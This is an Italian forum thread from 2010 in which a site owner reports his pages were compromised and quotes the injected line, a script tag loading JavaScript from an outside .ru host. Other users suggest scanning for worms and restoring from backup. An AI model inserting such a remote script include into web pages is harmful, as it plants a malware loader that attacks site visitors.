Visualizzazione risultati 1 fino 4 di 4

Discussione: Sito hackato?

Guest

Predefinito Sito hackato?

Scusate, non sapevo in che sezione postarlo visto che sono "agitato" dal fatto.......

Ho visitato il mio sito e improvvisamente mi dava un errore per un segno "inaspettato" nel codice"...... Il problema è che non lo tocco da giorni, e il fatto che sia spuntato all'improvviso mi ha fatto subito controllare i file, e infatti controllando ho trovato queste stringhe che si sono innestate nel codice non so come.....

Codice:
    <script type="text/javascript" src="http://galacticstall.ru/Leaderboard.js"></script>
     <!--db50f5170ad04119157d60b6562cbc46-->
    Qualcuno si è intrufolato vero?
    Ultima modifica di smackdownpsx : 03-08-2010 alle ore 21.08.22

L'avatar di Gianluca
    Gianluca non è connesso Amministratore

Predefinito

Verifica che il tuo pc non sia infetto da Koobface o Bagle, sono due worm normalmente responsabili di questo genere di fenomeni.

Maggiori informazioni: http://blog.unmaskparasites.com/2010...b-of-koobface/
    Ultima modifica di Gianluca : 03-08-2010 alle ore 21.13.26
    Gianluca

Guest

Predefinito

Farò scansioni sul mio pc, ma intanto....... Come rimedio? Ho rimosso le stringhe malefiche dalle pagine del mio sito, ma quando ci vado la index è perfettamente bianca e vuota......

Guest

Predefinito

Citazione Originalmente inviato da smackdownpsx Visualizza messaggio
    Farò scansioni sul mio pc, ma intanto....... Come rimedio? Ho rimosso le stringhe malefiche dalle pagine del mio sito, ma quando ci vado la index è perfettamente bianca e vuota......
    se hai fatto un backup del sito prova a sostituire i file con quelli che ha nel backup.
    A me avevano hackerato il file config.php sull'host del sito, e lo ho sostituito.